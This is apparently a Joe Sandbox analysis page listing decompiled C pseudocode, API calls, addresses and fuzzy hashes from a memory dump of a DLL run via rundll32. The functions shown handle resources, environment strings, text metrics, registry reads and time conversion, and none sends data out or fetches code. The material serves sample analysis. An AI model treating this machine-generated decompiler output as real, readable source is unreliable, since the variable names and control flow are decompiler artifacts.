                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
                                                                        • String ID:
                                                                        • API String ID: 1997773198-0
                                                                        • Opcode ID: b90460355c9c416a6456121d1bbb326fafcad12d6a2343548d863fd2063eeb59
                                                                        • Instruction ID: af3dbc7b5439278e81a751fce9c258c26a76ae2c050a4fbf0b7815c8002a2a19
                                                                        • Opcode Fuzzy Hash: b90460355c9c416a6456121d1bbb326fafcad12d6a2343548d863fd2063eeb59
                                                                        • Instruction Fuzzy Hash: B131263290121DABDF21CFA0DC85E9E7BB6EF08760F204114F955AA1A1DB70EA91DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10036A6D Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E10036A6D(intOrPtr __ecx, CHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t22;
				signed short _t23;
				void* _t24;
				signed int _t29;
				signed short _t31;
				void* _t37;
				signed short _t38;
				signed short* _t47;
				void* _t53;
				struct HINSTANCE__* _t56;
				void* _t58;

				_push(__ecx);
				_push(__ecx);
				_v8 = __ecx;
				_t56 =  *(E100373B5() + 0xc);
				_t22 = FindResourceA(_t56, _a4, 0xf1);
				if(_t22 == 0) {
					L3:
					_t23 = 0;
				} else {
					_t24 = LoadResource(_t56, _t22);
					_v12 = _t24;
					if(_t24 == 0) {
						goto L3;
					} else {
						_t58 = LockResource(_t24);
						if(_t58 != 0) {
							_push(_t37);
							_t53 = E1001F77E(( *(_t58 + 6) & 0x0000ffff) << 2);
							_t29 = 0;
							__eflags =  *(_t58 + 6);
							if( *(_t58 + 6) > 0) {
								_t7 = _t58 + 8; // 0x8
								_t47 = _t7;
								do {
									 *(_t53 + _t29 * 4) =  *_t47 & 0x0000ffff;
									_t29 = _t29 + 1;
									_t47 =  &(_t47[1]);
									__eflags = _t29 - ( *(_t58 + 6) & 0x0000ffff);
								} while (_t29 < ( *(_t58 + 6) & 0x0000ffff));
							}
							_t31 = E100366B1(_t37, _v8, _t53, _t58, _t53,  *(_t58 + 6) & 0x0000ffff);
							_push(_t53);
							_t38 = _t31;
							L1001F7A9(_t38, _t53, _t58, __eflags);
							__eflags = _t38;
							if(_t38 != 0) {
								_t44 =  *(_t58 + 4) & 0x0000ffff;
								E100368F3(_v8, ( *(_t58 + 2) & 0x0000ffff) + 7, ( *(_t58 + 4) & 0x0000ffff) + 7,  *(_t58 + 2) & 0x0000ffff, _t44);
								_t38 = E1003697A(_v8, _a4);
							}
							FreeResource(_v12);
							_t23 = _t38;
						} else {
							goto L3;
						}
					}
				}
				return _t23;
			}




















                                                                        0x10036a70
                                                                        0x10036a71
                                                                        0x10036a73
                                                                        0x10036a7b
                                                                        0x10036a87
                                                                        0x10036a8f
                                                                        0x10036aad
                                                                        0x10036aad
                                                                        0x10036a91
                                                                        0x10036a93
                                                                        0x10036a9b
                                                                        0x10036a9e
                                                                        0x00000000
                                                                        0x10036aa0
                                                                        0x10036aa7
                                                                        0x10036aab
                                                                        0x10036ab5
                                                                        0x10036ac0
                                                                        0x10036ac2
                                                                        0x10036ac4
                                                                        0x10036ac9
                                                                        0x10036acb
                                                                        0x10036acb
                                                                        0x10036ace
                                                                        0x10036ad1
                                                                        0x10036ad8
                                                                        0x10036ada
                                                                        0x10036adb
                                                                        0x10036adb
                                                                        0x10036ace
                                                                        0x10036ae8
                                                                        0x10036aed
                                                                        0x10036aee
                                                                        0x10036af0
                                                                        0x10036af5
                                                                        0x10036af8
                                                                        0x10036afa
                                                                        0x10036b0f
                                                                        0x10036b1f
                                                                        0x10036b1f
                                                                        0x10036b24
                                                                        0x10036b2b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10036aab
                                                                        0x10036a9e
                                                                        0x10036b30

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,000000F1), ref: 10036A87
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 10036A93
                                                                        • LockResource.KERNEL32(00000000), ref: 10036AA1
                                                                        • FreeResource.KERNEL32(?), ref: 10036B24
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLock
                                                                        • String ID:
                                                                        • API String ID: 1078018258-0
                                                                        • Opcode ID: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                        • Instruction ID: 90f7a23fa8f058c3dd6ac9528b305ebca7cc9ac8441aa778f718171523645421
                                                                        • Opcode Fuzzy Hash: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                        • Instruction Fuzzy Hash: 6321B375500621AED716DFA1CC84CBBB7ECEF48642B00C429F946DB251EB30ED41DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10016396 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E10016396() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t5;
				signed int _t6;
				signed int _t11;
				signed int _t12;
				signed int _t13;
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				intOrPtr _t32;

				_t32 =  *0x10050cac; // 0x1
				if(_t32 == 0) {
					_t5 = E10012D82();
				}
				_t26 =  *0x1004f3cc; // 0x0
				_t24 = 0;
				if(_t26 != 0) {
					while(1) {
						_t6 =  *_t26;
						__eflags = _t6;
						if(_t6 == 0) {
							break;
						}
						__eflags = _t6 - 0x3d;
						if(_t6 != 0x3d) {
							_t24 = _t24 + 1;
							__eflags = _t24;
						}
						_t26 = _t26 + E10011820(_t26) + 1;
					}
					_t5 = E100107B6(4 + _t24 * 4);
					_t25 = _t5;
					__eflags = _t25;
					 *0x1004f400 = _t25;
					if(_t25 != 0) {
						_t27 =  *0x1004f3cc; // 0x0
						while(1) {
							__eflags =  *_t27;
							if(__eflags == 0) {
								break;
							}
							_t30 = E10011820(_t27) + 1;
							__eflags =  *_t27 - 0x3d;
							if( *_t27 == 0x3d) {
								L14:
								_t27 = _t27 + _t30;
								__eflags = _t27;
								continue;
							}
							_t12 = E100107B6(_t30);
							__eflags = _t12;
							 *_t25 = _t12;
							if(__eflags == 0) {
								_push( *0x1004f400);
								_t13 = E100107C8(0, _t25, _t27, __eflags);
								 *0x1004f400 = 0;
								_t11 = _t13 | 0xffffffff;
								L17:
								return _t11;
							}
							E10017B90(_t12, _t27);
							_t25 = _t25 + 4;
							__eflags = _t25;
							goto L14;
						}
						_push( *0x1004f3cc);
						E100107C8(0, _t25, _t27, __eflags);
						 *0x1004f3cc = 0;
						 *_t25 = 0;
						 *0x10050ca0 = 1;
						_t11 = 0;
						__eflags = 0;
						goto L17;
					}
					goto L9;
				} else {
					L9:
					return _t5 | 0xffffffff;
				}
			}


















                                                                        0x10016399
                                                                        0x100163a1
                                                                        0x100163a3
                                                                        0x100163a3
                                                                        0x100163a8
                                                                        0x100163ae
                                                                        0x100163b2
                                                                        0x100163c6
                                                                        0x100163c6
                                                                        0x100163c8
                                                                        0x100163ca
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100163b6
                                                                        0x100163b8
                                                                        0x100163ba
                                                                        0x100163ba
                                                                        0x100163ba
                                                                        0x100163c2
                                                                        0x100163c2
                                                                        0x100163d4
                                                                        0x100163d9
                                                                        0x100163db
                                                                        0x100163de
                                                                        0x100163e4
                                                                        0x100163eb
                                                                        0x1001641e
                                                                        0x1001641e
                                                                        0x10016420
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100163fc
                                                                        0x100163fd
                                                                        0x10016401
                                                                        0x1001641c
                                                                        0x1001641c
                                                                        0x1001641c
                                                                        0x00000000
                                                                        0x1001641c
                                                                        0x10016404
                                                                        0x10016409
                                                                        0x1001640c
                                                                        0x1001640e
                                                                        0x10016447
                                                                        0x1001644d
                                                                        0x10016452
                                                                        0x10016458
                                                                        0x10016441
                                                                        0x00000000
                                                                        0x10016442
                                                                        0x10016412
                                                                        0x10016419
                                                                        0x10016419
                                                                        0x00000000
                                                                        0x10016419
                                                                        0x10016422
                                                                        0x10016428
                                                                        0x1001642d
                                                                        0x10016433
                                                                        0x10016435
                                                                        0x1001643f
                                                                        0x1001643f
                                                                        0x00000000
                                                                        0x1001643f
                                                                        0x00000000
                                                                        0x100163b4
                                                                        0x100163e6
                                                                        0x00000000
                                                                        0x100163e6

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen$___initmbctable_strcat
                                                                        • String ID:
                                                                        • API String ID: 109824703-0
                                                                        • Opcode ID: 5025062238c4e1958a2116478a36e172273b85c72821fd6fbf3ceedd2c77b50d
                                                                        • Instruction ID: 9c1e1b94b0f4e2beb856a7037c8e8469e0ad574bad187944a6078983aed9c00d
                                                                        • Opcode Fuzzy Hash: 5025062238c4e1958a2116478a36e172273b85c72821fd6fbf3ceedd2c77b50d
                                                                        • Instruction Fuzzy Hash: 831159768081A24EE311DF64AD8466A7BC5EB0B2B4721023EF1E0DB092DF31F9C1DB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002C73E Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E1002C73E(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				struct tagRECT _v32;
				struct HDC__* _v44;
				char _v52;
				struct tagTEXTMETRICA _v108;
				void* __ebp;
				long _t25;
				int _t35;
				intOrPtr* _t40;
				void* _t43;
				intOrPtr _t53;
				intOrPtr* _t59;
				intOrPtr _t60;

				_t59 = __ecx;
				_push(0);
				E100290F7( &_v52);
				_t25 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
				_t43 = 0;
				if(_t25 != 0) {
					_t43 = E1000866D( &_v52, _t25);
				}
				GetTextMetricsA(_v44,  &_v108);
				_t62 = _t43;
				if(_t43 != 0) {
					E1000866D( &_v52, _t43);
				}
				E10029152( &_v52, _t62);
				SetRectEmpty( &_v32);
				 *((intOrPtr*)( *_t59 + 0x13c))( &_v32, _a12);
				 *((intOrPtr*)( *_t59 + 0x110))(0x407, 0,  &_v16);
				_t35 = GetSystemMetrics(6);
				_t60 =  *((intOrPtr*)(_t59 + 0x90));
				_t53 = (_t35 + _v12 << 1) - _v32.bottom - _v32.top - _v108.tmInternalLeading + _v108.tmHeight - 1;
				if(_t53 < _t60) {
					_t53 = _t60;
				}
				_t40 = _a4;
				 *_t40 = 0x7fff;
				 *((intOrPtr*)(_t40 + 4)) = _t53;
				return _t40;
			}

















                                                                        0x1002c747
                                                                        0x1002c74b
                                                                        0x1002c74f
                                                                        0x1002c75b
                                                                        0x1002c761
                                                                        0x1002c765
                                                                        0x1002c770
                                                                        0x1002c770
                                                                        0x1002c779
                                                                        0x1002c77f
                                                                        0x1002c781
                                                                        0x1002c787
                                                                        0x1002c787
                                                                        0x1002c78f
                                                                        0x1002c798
                                                                        0x1002c7a9
                                                                        0x1002c7bd
                                                                        0x1002c7d0
                                                                        0x1002c7dc
                                                                        0x1002c7e9
                                                                        0x1002c7ef
                                                                        0x1002c7f1
                                                                        0x1002c7f1
                                                                        0x1002c7f3
                                                                        0x1002c7f8
                                                                        0x1002c7fa
                                                                        0x1002c7ff

                                                                        APIs
                                                                          • Part of subcall function 100290F7: __EH_prolog.LIBCMT ref: 100290FC
                                                                          • Part of subcall function 100290F7: GetDC.USER32(00000000), ref: 1002912A
                                                                        • SendMessageA.USER32 ref: 1002C75B
                                                                        • GetTextMetricsA.GDI32(?,?), ref: 1002C779
                                                                        • SetRectEmpty.USER32(?), ref: 1002C798
                                                                        • GetSystemMetrics.USER32 ref: 1002C7D0
                                                                          • Part of subcall function 1000866D: SelectObject.GDI32(?,?), ref: 1000867C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Metrics$EmptyH_prologMessageObjectRectSelectSendSystemText
                                                                        • String ID:
                                                                        • API String ID: 1847300772-0
                                                                        • Opcode ID: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                        • Instruction ID: 7e47f88f2f58757794e6d6d0f1f8ec1525fff8c624cfc69816e05b16ce6d54a2
                                                                        • Opcode Fuzzy Hash: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                        • Instruction Fuzzy Hash: 67217936A00218AFDB15DFA8DC89CEEBBB9FF88700F414529F512A7291DB717945CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000BEEF Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 81%
                                                                        			E1000BEEF(void* __edi) {
				intOrPtr _t35;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				signed int _t60;
				void* _t63;

				E10011BF0(0x1003aec3, _t63);
				_t60 = 0;
				 *((intOrPtr*)(_t63 - 0x10)) = 0;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x10040668;
				_t48 =  *((intOrPtr*)(_t63 + 8));
				 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = 0;
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t48 - 8)) == 0) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t48 - 0xac)) + 0x1c)) + 0x1c)));
					_t35 = E10029068();
					 *((intOrPtr*)(_t48 - 8)) = _t35;
					if(_t35 == 0) {
						goto L1;
					} else {
						if( *(_t63 + 0xc) != 0) {
							IntersectRect(_t63 - 0x24, _t48 - 0x9c,  *(_t63 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t60 = 0;
						}
						E1002935D(_t63 - 0x14, CreateRectRgnIndirect(_t63 - 0x24));
						E10028ED2( *((intOrPtr*)(_t48 - 8)), _t63 - 0x14, 1);
						_t50 =  *((intOrPtr*)(_t48 - 8));
						if(_t50 != _t60) {
							_t46 =  *((intOrPtr*)(_t50 + 4));
						} else {
							_t46 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = _t46;
					}
				} else {
					L1:
					_t60 = 0x80004005;
				}
				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t63 - 0x14)) = 0x1003eb6c;
				E100293B4(_t63 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t60;
			}









                                                                        0x1000bef4
                                                                        0x1000befe
                                                                        0x1000bf00
                                                                        0x1000bf03
                                                                        0x1000bf0d
                                                                        0x1000bf10
                                                                        0x1000bf15
                                                                        0x1000bf18
                                                                        0x1000bf33
                                                                        0x1000bf34
                                                                        0x1000bf3b
                                                                        0x1000bf3e
                                                                        0x00000000
                                                                        0x1000bf40
                                                                        0x1000bf43
                                                                        0x1000bf66
                                                                        0x1000bf45
                                                                        0x1000bf4f
                                                                        0x1000bf50
                                                                        0x1000bf51
                                                                        0x1000bf52
                                                                        0x1000bf53
                                                                        0x1000bf55
                                                                        0x1000bf7a
                                                                        0x1000bf88
                                                                        0x1000bf8d
                                                                        0x1000bf92
                                                                        0x1000bf98
                                                                        0x1000bf94
                                                                        0x1000bf94
                                                                        0x1000bf94
                                                                        0x1000bf9e
                                                                        0x1000bf9e
                                                                        0x1000bf1a
                                                                        0x1000bf1a
                                                                        0x1000bf1a
                                                                        0x1000bf1a
                                                                        0x1000bfa0
                                                                        0x1000bfa7
                                                                        0x1000bfae
                                                                        0x1000bfba
                                                                        0x1000bfc2

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CreateH_prologIndirectRect
                                                                        • String ID:
                                                                        • API String ID: 2123978231-0
                                                                        • Opcode ID: a87c0139d17cb296c7b54c5b9e1d23ff0820d98e6926aea6deb686421628d885
                                                                        • Instruction ID: 0eb4197897c7316f9a7e31aff11a4a7e3f3024ffe359f966774616c60da486ac
                                                                        • Opcode Fuzzy Hash: a87c0139d17cb296c7b54c5b9e1d23ff0820d98e6926aea6deb686421628d885
                                                                        • Instruction Fuzzy Hash: E121397690062ADFDB01CFA4C8849AEB7B8FF08790F514166F906AB255C771AE05CFB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10034B35 Relevance: 6.1, APIs: 4, Instructions: 71registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10034B35(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				char* _t32;
				intOrPtr _t34;
				char** _t35;
				signed int _t40;
				char** _t44;
				char* _t46;

				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
				_t46 =  *0x1004b390; // 0x1003d660
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t35 = 0x1004b390;
				if(_t46 == 0) {
					L13:
					RegCloseKey(0);
					return 1;
				}
				do {
					if(RegOpenKeyExA(0x80000001,  *_t35, 0, 1,  &_v8) != 0) {
						goto L11;
					}
					_t8 =  &(_t35[1]); // 0x1004b358
					_t44 =  *_t8;
					while(1) {
						_t32 =  *_t44;
						if(_t32 == 0) {
							goto L11;
						}
						if(RegQueryValueExA(_v8, _t32, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t34 = _v20;
							_t16 =  &(_t44[1]); // 0x1
							_t40 =  *_t16;
							if(_v12 == 0) {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) &  !_t40;
							} else {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) | _t40;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t44 =  &(_t44[2]);
					}
					L11:
					RegCloseKey(_v8);
					_t35 =  &(_t35[2]);
					_v8 = 0;
				} while ( *_t35 != 0);
				goto L13;
			}














                                                                        0x10034b3f
                                                                        0x10034b45
                                                                        0x10034b4b
                                                                        0x10034b4e
                                                                        0x10034b51
                                                                        0x10034b54
                                                                        0x10034b5b
                                                                        0x10034b5e
                                                                        0x10034b63
                                                                        0x10034bf1
                                                                        0x10034bf2
                                                                        0x10034bfe
                                                                        0x10034bfe
                                                                        0x10034b6a
                                                                        0x10034b80
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034b82
                                                                        0x10034b82
                                                                        0x10034bd3
                                                                        0x10034bd3
                                                                        0x10034bd7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034ba0
                                                                        0x10034bab
                                                                        0x10034bae
                                                                        0x10034bae
                                                                        0x10034bb1
                                                                        0x10034bbd
                                                                        0x10034bb3
                                                                        0x10034bb3
                                                                        0x10034bb3
                                                                        0x10034bb1
                                                                        0x10034bc3
                                                                        0x10034bc6
                                                                        0x10034bcd
                                                                        0x10034bd0
                                                                        0x10034bd0
                                                                        0x10034bd9
                                                                        0x10034bdc
                                                                        0x10034be2
                                                                        0x10034be7
                                                                        0x10034be7
                                                                        0x00000000

                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,1004B390,00000000,00000001,?), ref: 10034B78
                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 10034B98
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10034BDC
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 10034BF2
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Close$OpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 1607946009-0
                                                                        • Opcode ID: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                        • Instruction ID: c59a5bb59059241ef396f1e8f67c70b524d6e5c214a839477bb571e1d0f0587e
                                                                        • Opcode Fuzzy Hash: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                        • Instruction Fuzzy Hash: 86212CB5D00259EFDB06CF96C985EAEFBF8EF80355F1240AAE405AA151D770AA00CF21
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10026A96 Relevance: 6.1, APIs: 4, Instructions: 67timeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 89%
                                                                        			E10026A96(void* __ecx, void* __edx, intOrPtr _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				char _v44;
				void* __ebp;
				int _t23;
				int _t26;
				int _t29;
				int _t31;
				void* _t40;
				void* _t56;
				void* _t59;

				_t47 = __edx;
				_t40 = __ecx;
				_t56 = _t59;
				if(_a8 != 0) {
					_t52 = _a4;
					_v28.wYear = E10010297(__eflags);
					_v28.wMonth = E100102AE(__eflags);
					_t23 = E100134E7(_a4, __edx, _a4);
					__eflags = _t23;
					if(__eflags == 0) {
						_v28.wDay = 0;
					} else {
						_v28.wDay =  *((intOrPtr*)(_t23 + 0xc));
					}
					_v28.wHour = E100102C1(__eflags);
					_v28.wMinute = E100102D4(__eflags);
					_t26 = E100134E7(_t52, _t47, _t52);
					__eflags = _t26;
					if(_t26 == 0) {
						_t14 =  &(_v28.wSecond);
						 *_t14 = _v28.wSecond | 0x0000ffff;
						__eflags =  *_t14;
					} else {
						_v28.wSecond =  *_t26;
					}
					_v28.wMilliseconds = 0;
					_t29 = SystemTimeToFileTime( &_v28,  &_v12);
					__eflags = _t29;
					if(_t29 == 0) {
						E100271C6(_t56, GetLastError(), 0);
					}
					_t31 = LocalFileTimeToFileTime( &_v12, _a8);
					__eflags = _t31;
					if(_t31 == 0) {
						_t31 = E100271C6(_t56, GetLastError(), 0);
					}
					return _t31;
				} else {
					_push(_t56);
					_push(__ecx);
					_v44 = 0x1004d548;
					E10011C0F( &_v44, 0x10045e48);
					asm("int3");
					return  *((intOrPtr*)(_t40 + 0x70));
				}
			}














                                                                        0x10026a96
                                                                        0x10026a96
                                                                        0x10026a97
                                                                        0x10026aa3
                                                                        0x10026aaa
                                                                        0x10026ab6
                                                                        0x10026ac0
                                                                        0x10026ac4
                                                                        0x10026ac9
                                                                        0x10026acc
                                                                        0x10026ad8
                                                                        0x10026ace
                                                                        0x10026ad2
                                                                        0x10026ad2
                                                                        0x10026ae5
                                                                        0x10026aef
                                                                        0x10026af3
                                                                        0x10026af8
                                                                        0x10026afb
                                                                        0x10026b06
                                                                        0x10026b06
                                                                        0x10026b06
                                                                        0x10026afd
                                                                        0x10026b00
                                                                        0x10026b00
                                                                        0x10026b14
                                                                        0x10026b18
                                                                        0x10026b1e
                                                                        0x10026b26
                                                                        0x10026b2c
                                                                        0x10026b2c
                                                                        0x10026b38
                                                                        0x10026b3e
                                                                        0x10026b40
                                                                        0x10026b46
                                                                        0x10026b46
                                                                        0x10026b4e
                                                                        0x10026aa5
                                                                        0x1001ce6f
                                                                        0x1001ce72
                                                                        0x1001ce7c
                                                                        0x1001ce83
                                                                        0x1001ce88
                                                                        0x1001ce8c
                                                                        0x1001ce8c

                                                                        APIs
                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 10026B18
                                                                        • GetLastError.KERNEL32(00000000), ref: 10026B29
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,0000FFFF), ref: 10026B38
                                                                        • GetLastError.KERNEL32(00000000), ref: 10026B43
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Time$File$ErrorLast$LocalSystem
                                                                        • String ID:
                                                                        • API String ID: 1172841412-0
                                                                        • Opcode ID: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
                                                                        • Instruction ID: f1a830ef30183d99209262c84c87e780bb224e30df7a02b89f1332faec0a7339
                                                                        • Opcode Fuzzy Hash: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
